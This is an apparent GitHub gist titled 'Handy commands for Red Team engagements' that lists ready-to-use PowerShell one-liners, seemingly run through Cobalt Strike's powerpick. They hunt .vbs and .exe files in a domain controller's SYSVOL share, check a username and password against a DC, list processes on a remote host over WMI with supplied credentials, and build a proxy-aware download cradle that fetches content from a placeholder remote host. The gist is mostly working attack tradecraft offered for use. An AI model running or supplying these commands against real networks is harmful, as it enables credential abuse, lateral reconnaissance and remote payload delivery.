Last active
July 11, 2020 10:52
-
-
Save qgrosperrin/d6763db93e34610d18773ee344b690ce to your computer and use it in GitHub Desktop.
Handy commands for Red Team engagements
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Hunting files on domain controllers: | |
powerpick gci -path \\<DC-hostname>\SYSVOL\<fqdn>\ -Recurse | ? {$_.name -match ".vbs"} | |
powerpick gci -path \\<DC-hostname>\SYSVOL\<fqdn>\ -Recurse | ? {$_.name -match ".exe"} | |
# Validating password | |
powerpick Add-Type -AssemblyName System.DirectoryServices.AccountManagement;$contextType = [System.DirectoryServices.AccountManagement.ContextType]::Domain;$principalContext = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($contextType, '<DC-hostname>');$principalContext.ValidateCredentials('<username>', '<password>') | |
# Curated output for listing processes (WMI) | |
powerpick $Password = ConvertTo-SecureString "<password>" -asplaintext -force; $Credential = New-Object -Typename System.Management.Automation.PSCredential -ArgumentList "<DOMAIN\username>",$Password;Get-WMIObject Win32_Process -computername <target-hostname> -Credential $Credential| ?{$_.GetOwner().User -NotLike 'SYSTEM' -and $_.GetOwner().User -NotLike "*SERVICE"} | select ProcessID,Name,@{n='Owner';e={$_.GetOwner().User}} | fl | |
# PowerShell download cradle with Proxy | |
$p=[System.Net.WebRequest]::GetSystemWebProxy();$p.Credentials=[System.Net.CredentialCache]::DefaultCredentials;$c=new-object system.net.WebClient;$c.proxy=$p;$x=$c.downloadstring('https://domain/test') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment